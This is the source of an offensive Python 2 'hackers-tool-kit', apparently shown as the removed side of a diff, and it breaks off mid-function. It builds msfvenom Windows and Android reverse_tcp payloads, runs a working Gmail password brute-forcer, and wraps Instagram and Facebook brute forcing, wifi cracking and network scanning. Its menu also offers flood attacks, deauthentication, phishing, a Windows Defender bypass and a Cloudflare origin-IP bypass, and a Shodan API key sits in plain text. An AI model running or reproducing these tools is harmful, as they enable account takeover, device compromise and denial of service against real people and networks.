░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """\033[91m -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - """.decode('utf-8') - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,9) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = 